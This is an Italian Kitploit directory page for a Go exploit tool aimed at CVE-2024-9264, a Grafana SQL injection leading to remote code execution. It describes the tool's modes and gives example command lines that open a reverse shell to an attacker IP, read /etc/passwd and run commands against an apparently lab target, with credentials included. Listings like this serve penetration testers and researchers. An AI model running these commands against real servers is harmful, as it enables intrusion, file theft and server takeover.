Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9264 — Un'implementazione in Go per CVE-2024-9264 che colpisce le versioni di Grafana 11.0.x, 11.1.x e 11.2.x. | Kitploit
Strumenti/GitHubGitHub/cythonic1/cve-2024-9264
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Un'implementazione in Go per CVE-2024-9264 che colpisce le versioni di Grafana 11.0.x, 11.1.x e 11.2.x.

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

🚨 CVE-2024-9264 - Iniezione SQL in Grafana che porta a Remote Code Execution (RCE) e lettura di file

Strumento di exploit per CVE-2024-9264, una vulnerabilità critica in Grafana che consente a un utente autenticato di eseguire una query SQL che porta a RCE

🛡️ Questo strumento è strettamente per scopi educativi e test di penetrazione autorizzati.
L'uso non autorizzato è illegale e non etico.


🧠 Panoramica della vulnerabilità

🕳️ Cos'è CVE-2024-9264?

CVE-2024-9264 è una falla critica in Grafana che consente a un utente autenticato di eseguire comandi SQL, portando a RCE e lettura di file.

🧬 Causa principale

  • Sanitizzazione insufficiente.

💥 Impatto

  • RCE: Esegue comandi arbitrari, ottiene reverse shell o legge file sensibili.
  • Gravità elevata: Possibile compromissione totale del server se l'attacco riesce.

⚒️ Funzionalità

  • Supporta più modalità di attacco:
    • file – Legge file arbitrari (es. /etc/passwd)
    • shell – Reverse shell verso la macchina dell'attaccante
    • command – Esegue comandi shell arbitrari (es. whoami)
  • IP, porta e credenziali dell'attaccante personalizzabili

🚀 Utilizzo

menu di aiuto

Non tutti gli argomenti sono necessari.

esempi

Ottenere una shell

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

Leggere file

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

Esegui un singolo comando

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 Flag della riga di comando

go run main.go [flags]

Scarica lo strumento